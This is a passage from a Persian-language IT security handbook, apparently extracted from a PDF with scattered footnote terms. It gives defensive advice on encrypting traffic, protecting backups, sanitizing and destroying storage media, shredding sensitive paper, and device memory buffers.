•
ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺭ ﻣﻘﺎﺑﻞ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﺣﻔﺎﻇﺖ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﻤﻴﺸﻪ ﺑﺎ ﺍﻳﻦ ﻓﺮﺽ ﻛﻪ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺷـﻤﺎ ﺗﺤـﺖ
ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ،ﺭﻣﺰﮔﺬﺍﺭﻱ ﺗﻤﺎﻡ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍ ﻻﺯﻡ ﺑﺸﻤﺎﺭﻳﺪ .ﻭﻗﺘﻲ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﻧﻴﺴﺖ ،ﺣﺪﺍﻗﻞ ﻫﻤﻪ ﺗﺮﺍﻓﻴﻚ ﺣـﺴﺎﺱ
ﺷﺒﻜﻪ )ﻣﺜﻞ ﺍﺳﺎﻣﻲ ﻛﺎﺭﺑﺮﻱ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺩﺭ ﺧﺪﻣﺎﺕ ﺭﺍﻩ ﺩﻭﺭ( ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﺪ.
٥٩
ﺣﻔﺎﻇﺖ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ
ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﺎﻳﺪ ﭘﻴﺸﻨﻴﺎﺯ ﻫﺮ ﻋﻤﻠﻴﺎﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ -ﺍﻳﻤﻦ ﻳﺎ ﻏﻴﺮ ﺍﻳﻤﻦ -ﺑﺎﺷﻨﺪ ،ﺍﻣﺎ ﺑﻪ ﻫﺮﺣﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴـﺮﻩﺷـﺪﻩ ﺩﺭ ﻧﻮﺍﺭﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ
ﺑﺴﻴﺎﺭ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ .ﺣﺪﺍﻗﻞ ﺑﻪ ﻫﻤﺎﻥ ﺍﻧﺪﺍﺯﻩ ﻛﻪ ﺑﻪ ﻃﻮﺭ ﻣﻌﻤﻮﻝ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺣﻔﺎﻇﺖ ﻣﻲﻛﻨﻴﺪ ﺍﺯ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎﻳﺘﺎﻥ ﻣﺤﻔﺎﻇـﺖ ﻛﻨﻴـﺪ.
ﻫﻴﭻ ﻭﻗﺖ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﻧﺎﺣﻴﺔ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﻋﻤﻮﻣﻲ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒﺖ ﺭﻫﺎ ﻧﻜﻨﻴﺪ ،ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﻣﺤﻠﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﻓﻴﺰﻳﻜﻲ ﺍﻳﻤﻦ ﻫﺴﺘﻨﺪ )ﺑﻬﺘـﺮ
ﺍﺳﺖ ﺟﺎﻳﻲ ﺧﺎﺭﺝ ﺍﺯ ﻣﺤﻞ ﻧﮕﻬﺪﺍﺭﻱ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﺘﺎﻥ ﺑﺎﺷﺪ( ﻧﮕﻬﺪﺍﺭﻳﺪ ،ﻭ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ﺑﻪ ﭼﻪ ﻛﺴﻲ ﺍﻋﺘﻤﺎﺩ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺁﻧﻬـﺎ ﺭﺍ ﺍﺯ ﻣﺤﻠـﻲ ﺑـﻪ ﻣﺤـﻞ
ﺩﻳﮕﺮ ﺣﻤﻞ ﻛﻨﺪ.
ﺑﻴﺸﺘﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺑﻪ ﺷﻤﺎ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﻗﺒﻞ ﺍﺯ ﻧﻮﺷـﺘﻪﺷـﺪﻥ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﭘـﺸﺘﻴﺒﺎﻥ ،ﺁﻧﻬـﺎ ﺭﺍ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻛﻨﻴـﺪ.
ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺭﻣﺰﺷﺪﻩ ﺑﻪ ﻣﻴﺰﺍﻥ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺍﻣﻜﺎﻥ ﻣﻔﻴﺪ ﻭﺍﻗﻊ ﺷﺪﻥ ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﻳﺎ ﻧﻮﺍﺭﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﻣـﺴﺮﻭﻗﻪ ﺭﺍ ﺑـﺮﺍﻱ ﺭﻗﻴـﺐ
ﻛﺎﻫﺶ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺩ .ﭼﻨﺎﻧﭽﻪ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﻴﺪ ،ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺍﺯ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻴﺰ ﻣﺤﻔﺎﻇﺖ ﻣﻲﻛﻨﻴﺪ ،ﺗﺎ ﻫﻢ
ﻣﻬﺎﺟﻢ ﻧﺘﻮﺍﻧﺪ ﺁﻧﺮﺍ ﺑﻴﺎﺑﺪ ،ﻭ ﻫﻢ ﺩﺭﺻﻮﺭﺕ ﺗﻌﻮﻳﺾ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻛﻠﻴﺪ ﺷﻤﺎ ﮔﻢ ﻧﺸﻮﺩ.
ﻼ ﻧﻮﺍﺭ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻧﺴﺒﺖ ﺑـﻪ ﻓﺮﺁﻳﻨـﺪﻱ
ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺑﺎﻳﮕﺎﻧﻲﻫﺎ ﺑﻌﻠﺖ ﺷﺮﺍﻳﻂ ﻣﺤﻴﻄﻲ ﺁﺭﺍﻡ ﺁﺭﺍﻡ ﭘﺎﻙ ﻣﻲﺷﻮﻧﺪ .ﻣﺜ ﹰ
ﻣﻮﺳﻮﻡ ﺑﻪ print throughﺁﺳﻴﺐﭘﺬﻳﺮ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﻴﺪﺍﻧﻬﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻳـﻚ ﻗـﺴﻤﺖ ﭘﻴﭽﻴـﺪﻩ ﺷـﺪﻩ ﺑـﻪ ﺩﻭﺭ ﻗﺮﻗـﺮﺓ ﻧـﻮﺍﺭ ،ﺭﻭﻱ
ﻻﻳﻪﻫﺎﻱ ﺯﻳﺮﻳﻦ ﺍﺛﺮ ﻣﻲﮔﺬﺍﺭﻧﺪ .ﺗﻨﻬﺎ ﺭﺍﻩ ﺍﻳﻨﻜﻪ ﺑﻔﻬﻤﻴﻢ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺁﺳﻴﺐ ﻣﻲﺭﺳﺎﻧﺪ ﻳﺎ ﻧﻪ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﻫـﺮ ﺍﺯ
ﭼﻨﺪﮔﺎﻩ ﺑﺮﺭﺳﻲ ﻛﻨﻴﻢ.
۵۹
ﺁﺩﺭﺱ ﻓﻴﺰﻳﻜﻲ ﺛﺎﺑﺖ ﻫﺮ ﮔﺮﻩ ﺩﺭ ﺷﻜﺒﻪ
Firewall
SSID Broadcasts
Wireless Access Point
60
61
62
٢٨٩
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻳﻚ ﻣﺸﻜﻞ ﺑﺴﻴﺎﺭ ﺭﺍﻳﺞ ،ﺑﺮﭼﺴﺐﺯﻧﻲ ﻭ ﺻﻮﺭﺕ ﺑﺮﺩﺍﺭﻱ ﻧﺎﻣﻨﺎﺳﺐ ﺍﺯ ﺭﺳﺎﻧﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻣﻲﺑﺎﺷﺪ .ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻫﺮ ﺳﻴﺴﺘﻢ ﺑﺮﭼﺴﺐﮔـﺬﺍﺭﻱ
ﻼ ﻣﺴﺘﻨﺪﺳﺎﺯﻱ ﻧﻤﺎﻳﻴﺪ.
ﻳﺎ ﻓﻬﺮﺳﺖﺑﺮﺩﺍﺭﻱ ﻛﻪ ﻣﺆﺛﺮ ﻣﻲﺩﺍﻧﻴﺪ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴﺪ ،ﻣﺸﺮﻭﻁ ﺑﺮ ﺍﻳﻨﻜﻪ ﻳﻜﻲ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻧﻤﻮﺩﻩ ﻭ ﻛﺎﻣ ﹰ
ﭘﺎﻛﺴﺎﺯﻱ ﺭﺳﺎﻧﻪ ﻗﺒﻞ ﺍﺯ ﺍﻧﻬﺪﺍﻡ
ﻼ ﺑـﻪ ﻃـﻮﺭ ﻛﺎﻣـﻞ ﭘـﺎﻙ
ﻭﻗﺘﻲ ﺩﻳﺴﻚﮔﺮﺩﺍﻧﻬﺎ ،ﺩﻳﺴﮑﻬﺎﻱ ﻓﺸﺮﺩﻩ ،ﻳﺎ ﻧﻮﺍﺭﻫﺎ ﺭﺍ ﺍﺯ ﺭﺩﻩ ﺧﺎﺭﺝ ﻣﻲﻛﻨﻴﺪ ،ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺳﺎﻧﻪ ﻗـﺒ ﹰ
ﺷﺪﻩﺍﻧﺪ .ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﭘﺎﻛﺴﺎﺯﻱ ٦٣ﻧﺎﻡ ﺩﺍﺭﺩ .ﺣﺬﻑ ﻣﻌﻤﻮﻟﻲ ﻭ ﺳﺎﺩﺓ ﻳﻚ ﻓﺎﻳﻞ ﻛﻪ ﺭﻭﻱ ﺩﻳﺴﻚ ﺳﺨﺖ ﺷﻤﺎ ﺍﺳﺖ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻓﺎﻳـﻞ
ﻻ ﻗﺴﻤﺘﻬﺎﻳﻲ ﺍﺯ ﺩﺍﺩﺓ ﺍﺻﻠﻲ -ﻭ ﮔﺎﻫﻲ ﻛﻞ ﻓﺎﻳﻞ -ﺑﻪ ﺁﺳﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﺮﻣﻴﻢ ﺷﻮﻧﺪ .ﺩﻳﺴﻜﻬﺎﻱ ﺳﺨﺖ ﺑﺎﻳـﺪ ﺑـﺎ
ﺭﺍ ﺍﺯ ﺑﻴﻦ ﻧﻤﻲﺑﺮﺩ .ﻣﻌﻤﻮ ﹰ
ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺨﺼﻮﺹ ﻛﻪ ﺑﻄﻮﺭ ﺧﺎﺹ ﺑﺮﺍﻱ ﻫﺮ ﻧﻮﻉ ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﭘﺎﻛﺴﺎﺯﻱ ﺷﻮﺩ.
ﺩﺭ ﻣﻮﺭﺩ ﻧﻮﺍﺭﻫﺎ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﭘﺎﻙﻛﻨﻨﺪﻩ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻳﺎ ﭘﺎﻛﺴﺎﺯ ﺍﻧﺒﻮﻩ -ﻳﻚ ﻭﺳﻴﻠﺔ ﺩﺳﺘﻲ ﺍﻟﻜﺘﺮﻭﻣﻐﻨﺎﻃﻴﺴﻲ ﻛـﻪ ﺩﺍﺭﺍﻱ ﻣﻴـﺪﺍﻥ
ﻣﻐﻨﺎﻃﻴﺴﻲ ﻗﻮﻱ ﺍﺳﺖ -ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ .ﺍﻃﻼﻋﺎﺕ ﻧﻮﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ﺍﻧﺒﻮﻩ ﭘﺎﻛﺴﺎﺯﻱ ﻛﺮﺩﻩﺍﻳﺪ ﺭﺍ ﺁﻧﻘﺪﺭ ﻣﺠﺪﺩﹰﺍ ﺑﺨﻮﺍﻧﻴﺪ ﺗﺎ ﺑﻔﻬﻤﻴﺪ ﺑـﺮﺍﻱ
ﻣﺤﻮ ﻧﻤﻮﺩﻥ ﺩﺍﺩﻩﻫﺎ ﭼﻨﺪ ﺑﺎﺭ ﭘﺎﻙ ﻛﺮﺩﻥ ﺁﻧﻬﺎ ﺑﻪ ﺍﻳﻦ ﺭﻭﺵ ﻻﺯﻡ ﺍﺳﺖ.
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺑﺎﺯﻧﻮﻳﺴﻲ ﺭﺳﺎﻧﻪ ﻧﻮﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺣﺘﻲ ﻣﺤﺘﻮﻳﺎﺕ ﺭﺳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﺗﻨﻬﺎ ﻳﻜﺒﺎﺭ ﻗﺎﺑﻞ ﻧﻮﺷﺘﻦ ﻫـﺴﺘﻨﺪ ﺭﺍ ﻧﻴـﺰ ﭘـﺎﻙ
ﻣﻲﻛﻨﻨﺪ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﺛﺮﺑﺨﺸﻲ ﺍﻳﻦ ﺭﻭﺷﻬﺎ ﺍﺯ ﻳﻚ ﻧﻮﻉ ﺭﺳﺎﻧﻪ ﺑﻪ ﻧﻮﻉ ﺩﻳﮕﺮ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﺪ ،ﻭ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﺎﺯﻫﻢ ﻣﺎﻧـﺪﻩﻫـﺎﻳﻲ ﺍﺯ
ﺧﻮﺩ ﺑﺮﺟﺎ ﺑﮕﺬﺍﺭﺩ .ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﺷﺎﻳﺪ ﻧﺎﺑﻮﺩ ﻛﺮﺩﻥ ﻓﻴﺰﻳﻜﻲ ﺍﺭﺟﺢ ﺑﺎﺷﺪ.
ﻛﻮﺭﻩﻫﺎﻱ ﺯﺑﺎﻟﻪﺳﻮﺯﻱ ﻭ ﺣﻤﺎﻡﻫﺎﻱ ﺍﺳﻴﺪﻱ ﺑﺮﺍﻱ ﺍﺯ ﺑﻴﻦ ﺑﺮﺩﻥ ﻧﻮﺍﺭﻫﺎ ﺑﺴﻴﺎﺭ ﻣﻨﺎﺳﺐ ﻫﺴﺘﻨﺪ ،ﺍﻣﺎ ﺍﺯ ﻧﻈﺮ ﺷﺮﺍﻳﻂ ﻣﺤﻴﻂ ﺯﻳﺴﺖ ﻗﺎﺑﻞ ﻗﺒـﻮﻝ
ﻧﻤﻲﺑﺎﺷﻨﺪ .ﺗﺎ ﻫﻤﻴﻦ ﺍﻭﺍﺧﺮ ﺷﻜﺴﺘﻦ ﺩﻳﺴﻜﻬﺎﻱ ﺳﺨﺖ ﻭ ﺑﺴﺘﻪﻫـﺎﻱ floppyﺗـﺮﺟﻴﺢ ﺩﺍﺩﻩ ﻣـﻲﺷـﺪ ،ﺍﻣـﺎ ﺑـﺎ ﺍﻓـﺰﺍﻳﺶ ﺣﺠـﻢ ﺩﻳـﺴﻜﻬﺎ،
ﺩﻳﺴﻚﮔﺮﺩﺍﻧﻬﺎ ﺑﺎﻳﺪ ﺑﻪ ﻗﻄﻌﺎﺕ ﻛﻮﭼﻜﺘﺮ ﻭ ﻛﻮﭼﻜﺘﺮﻱ ﺷﻜﺴﺘﻪ ﺷﻮﻧﺪ ﺗﺎ ﺍﻣﻜﺎﻥ ﺗﺤﻠﻴﻞ ﺁﺯﻣﺎﻳﺸﮕﺎﻫﻲ ﻣﻮﺍﺩ ﺣﺎﺻﻠﻪ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺑﺮﺍﻱ
ﺩﻳﺴﻚﮔﺮﺩﺍﻧﻬﺎ ﺩﺳﺘﮕﺎﻩ ﭘﺎﻙﻛﻨﻨﺪﺓ ﻣﻐﻨﺎﻃﺴﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻭﻟﻲ ﻫﺰﻳﻨﺔ ﺁﻥ ﺑﺎﻻﺳﺖ .ﺩﺭﻧﺘﻴﺠﻪ ﺑﺘﺪﺭﻳﺞ ﺭﻭﺷﻬﺎﻱ ﭘﺎﻛﺴﺎﺯﻱ ﻭ ﺍﻧﻬﺪﺍﻡ ﻓﻴﺰﻳﻜـﻲ
ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑﺎ ﺗﻜﻨﻴﻜﻬﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﻭﺍﺝ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﻣﻲﺩﻫﻨﺪ.
ﻳﻚ ﺭﻭﺵ ﺭﺍﻳﺞ ﭘﺎﻛﺴﺎﺯﻱ ،ﺑﺎﺯﻧﻮﻳﺴﻲ ﻛﻞ ﺩﻳﺴﻚ ﻳﺎ ﻧﻮﺍﺭ ﺍﺳﺖ .ﺍﮔﺮ ﺑﺎ ﺍﻃﻼﻋﺎﺕ ﺑﺴﻴﺎﺭ ﻣﺤﺮﻣﺎﻧﻪ ﻳﺎ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﻣﻨﻴﺖ ﺳﺮﻭﻛﺎﺭ ﺩﺍﺭﻳـﺪ ،ﺷـﺎﻳﺪ
ﺑﺨﻮﺍﻫﻴﺪ ﻳﻚ ﻧﻮﺍﺭ ﻳﺎ ﺩﻳﺴﻚ ﺭﺍ ﭼﻨﺪﺑﺎﺭ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻛﻨﻴﺪ ،ﭼﻮﻥ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺩﺍﺩﻩ ﺍﺯ ﻧﻮﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺗﻨﻬﺎ ﻳﻜﺒﺎﺭ ﺑﺎﺯﻧﻮﻳﺴﻲ ﺷﺪﻩﺍﻧﺪ
ﻻ ﻧﻮﺍﺭﻫﺎ ﺳﻪ ﺑﺎﺭ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻣﻲﺷﻮﻧﺪ -ﻳﻜﺒﺎﺭ ﺑﺎ ﺑﻠﻮﻛﻬﺎﻱ "ﺻﻔﺮ" ،ﻳﻜﺒﺎﺭ ﺑﺎ ﺑﻠﻮﻛﻬـﺎﻱ "ﻳـﻚ" ،ﻭ ﻳﻜﺒـﺎﺭ ﻫـﻢ ﺑـﺎ ﺍﻋـﺪﺍﺩ
ﺑﺎﺯﻳﺎﻓﺖ ﺷﻮﺩ .ﻣﻌﻤﻮ ﹰ
ﺗﺼﺎﺩﻓﻲ .ﺩﺭ ﻧﻬﺎﻳﺖ ﻣﻲﺗﻮﺍﻥ ﻧﻮﺍﺭ ﺭﺍ ﭼﻨﺪﺑﺎﺭ ﺍﺯ ﺍﺭﺓ ﻧﻮﺍﺭﻱ ﻋﺒﻮﺭ ﺩﺍﺩ ﺗﺎ ﺑﻪ ﻫﺰﺍﺭﺍﻥ ﻗﻄﻌﺔ ﻛﻮﭼﻚ ﭘﻼﺳﺘﻴﻜﻲ ﺗﺒﺪﻳﻞ ﺷﻮﺩ.
ﺍﻃﻼﻋﺎﺕ ﻣﻜﺘﻮﺏ ﻛﻪ ﺭﺍﻫﻲ ﺯﺑﺎﻟﻪﺩﺍﻧﻲ ﻣﻲﺷﻮﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺑﺎﺷﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﻣﺠﺮﻣﺎﻥ ﻳﺎ ﺭﻗﺒﺎ ﺑﻪ ﻛﺎﺭ ﺑﻴﺎﻳﺪ .ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ
ﺷﺎﻣﻞ ﻧﺴﺨﻪﻫﺎﻱ ﭼﺎﭘﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ )ﺍﺯ ﺟﻤﻠﻪ ﻧﺴﺨﻪﻫﺎﻱ ﻧﺎﻗﺺ( ،ﺧﻼﺻﻪﻫﺎ ،ﺍﺳﻨﺎﺩ ﻃﺮﺍﺣﻲ ،ﻣﺘﻦ ﺍﻭﻟﻴﺔ ﺑﺮﻧﺎﻣﻪ ،ﺍﺳﻨﺎﺩ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ،ﺧﺒﺮﻧﺎﻣﻪﻫـﺎﻱ
ﺩﺍﺧﻠﻲ ،ﺩﻓﺘﺮﭼﺔ ﺗﻠﻔﻦ ﻭ ﻛﺘﺎﺑﻬﺎﻱ ﺭﺍﻫﻨﻤﺎﻱ ﺷﺮﻛﺖ ﻭ ﻣﻮﺍﺭﺩ ﺩﻳﮕﺮ ﻣﻲﺷﻮﺩ .ﺍﻃﻼﻋﺎﺕ ﺩﻳﮕﺮﻱ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺯﺑﺎﻟﻪﺩﺍﻧﻲ ﺭﻳﺨﺘـﻪ ﺷـﻮﺩ
ﺷﺎﻣﻞ ﺍﻧﻮﺍﻉ ﻧﺴﺨﻪﻫﺎﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﺭﺍﻳﺎﻧﻪﻫﺎ ،ﺷﻤﺎﺭﻩﻫﺎﻱ ﺳﺮﻳﺎﻝ ،ﺳﻄﺢ ﻧﺼﺐ ﺑﻮﺩﻥ ﺍﺻﻼﺣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻭ ﻣﺎﻧﻨـﺪ ﺁﻥ ﻣـﻲﺷـﻮﺩ .ﺍﻳـﻦ
ﺍﺳﻨﺎﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺑﺮ ﺩﺍﺭﻧﺪﻩ ﺍﺳﺎﻣﻲ ﻣﻴﺰﺑﺎﻧﻬﺎ ،ﺷﻤﺎﺭﻩﻫﺎﻱ ،IPﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﺳﺎﻳﺮ ﺍﻃﻼﻋﺎﺕ ﺣﻴﺎﺗﻲ ﺑﺮﺍﻱ ﻳﻚ ﻣﻬﺎﺟﻢ ﺑﺎﺷـﻨﺪ.
ﺷﻨﻴﺪﻩ ﺷﺪﻩ ﻛﻪ ﺑﺮﺧﻲ ﺍﺯ ﺷﺮﻛﺘﻬﺎ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﺎﻣﻞ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺩﻳﻮﺍﺭﻩ ﺁﺗﺶ ﻭ ﺿﻮﺍﺑﻂ ﻏﺮﺑﺎﻝﺳﺎﺯﻱ - ٦٤ﻳﻚ ﻣﻌﺪﻥ ﻃﻼ ﺑﺮﺍﻱ ﻛـﺴﻲ ﻛـﻪ
ﺑﺪﻧﺒﺎﻝ ﻧﻔﻮﺫ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﺳﺖ -ﺭﺍ ﺑﺪﻭﻥ ﻫﻴﭻ ﻣﺮﺍﻗﺒﺖ ﺧﺎﺻﻲ ﺩﻭﺭ ﻣﻲﺭﻳﺰﻧﺪ.
Sanitizing
Filtering
63
64
ﺑﺨﺶ ﭘﻨﺠﻢ
ﭘﺎﻛﺴﺎﺯﻱ ﺍﺳﻨﺎﺩ ﻣﻜﺘﻮﺏ
٢٩٠
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺑﺮﺍﻱ ﻫﺮﺟﺎ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺍﺭﺯﺵ ﺩﺭ ﺁﻧﺠﺎ ﺩﻭﺭ ﺭﻳﺨﺘﻪ ﻣﻲﺷﻮﺩ ﻛﺎﻏﺬ ﺧﺮﺩﻛﻦ ﺗﻬﻴﻪ ﻛﻨﻴﺪ .ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺁﻣﻮﺯﺵ ﺩﻫﻴﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ
ﺭﺍ ﺩﺭ ﺳﻄﻠﻬﺎﻱ ﺧﺎﻧﻪ ﺩﻭﺭ ﻧﻴﺎﻧﺪﺍﺯﻧﺪ ،ﺑﻠﻜﻪ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﺩﻓﺘﺮ ﺑﻴﺎﻭﺭﻧﺪ ﺗﺎ ﺩﺭ ﺩﺳﺘﮕﺎﻩ ﺧﺮﺩ ﺷﻮﻧﺪ .ﺍﮔﺮ ﺳﺎﺯﻣﺎﻧﺘﺎﻥ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛـﺎﻓﻲ ﺑـﺰﺭﮒ ﺍﺳـﺖ ﻭ
ﻗﺎﻧﻮﻥ ﺑﻪ ﺷﻤﺎ ﺍﻳﻦ ﺍﺟﺎﺯﻩ ﺭﺍ ﻣﻲﺩﻫﺪ ،ﺷﺎﻳﺪ ﻣﺎﻳﻞ ﺑﺎﺷﻴﺪ ﺑﺮﺧﻲ ﺍﺯ ﺩﻭﺭﺭﻳﺰﻫﺎﻱ ﻛﺎﻏﺬﻫﺎﻱ ﺣﺴﺎﺱ ﺭﺍ ﺩﺭ ﻣﺤﻮﻃﻪ ﻛﺎﺭﺧﺎﻧﻪ ﺑﺴﻮﺯﺍﻧﻴﺪ.
ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺎﻓﻈﻪﻫﺎﻱ ﻣﺤﻠﻲ
ﻋﻼﻭﻩ ﺑﺮ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﺍﻧﺒﻮﻩ ،ﺑﺴﻴﺎﺭﻱ ﺩﻳﮕﺮ ﺍﺯ ﺗﺠﻬﻴﺰﺍﺕ ﭘـﺮﺩﺍﺯﺵ ﺍﻟﻜﺘﺮﻳﻜـﻲ ﺩﺍﺩﻩﻫـﺎ ﻧﻴـﺰ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺩﺭ ﺧـﻮﺩ
ﻻ bufferﻫﺎﻱ ﺣﺎﻓﻈﻪ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑـﺎ ﺩﺳـﺘﻮﺭﺍﺕ
ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﻨﺪ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﭘﺎﻳﺎﻧﻪﻫﺎ ،٦٥ﻣﻮﺩﻣﻬﺎ ،ﻭ ﭼﺎﭘﮕﺮﻫﺎﻱ ﻟﻴﺰﺭﻱ ﻣﻌﻤﻮ ﹰ
ﻣﻨﺎﺳﺐ ﻛﻨﺘﺮﻟﻲ ﺑﺎﺭﮔﺬﺍﺭﻱ ﻳﺎ ﺑﺎﺭﺑﺮﺩﺍﺭﻱ ﺷﻮﻧﺪ.
